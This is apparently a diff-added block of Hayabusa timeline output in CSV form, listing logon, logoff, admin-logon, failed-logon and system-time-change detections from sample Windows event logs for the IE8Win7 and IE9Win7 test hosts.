+2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:54:10.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:29.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:04:18.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:25.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:41:16.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:42:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 10:43:32.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:07:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:51:44.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:52:38.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:36:37.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:21.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:50:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:19.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 08:03:47.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:34:56.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
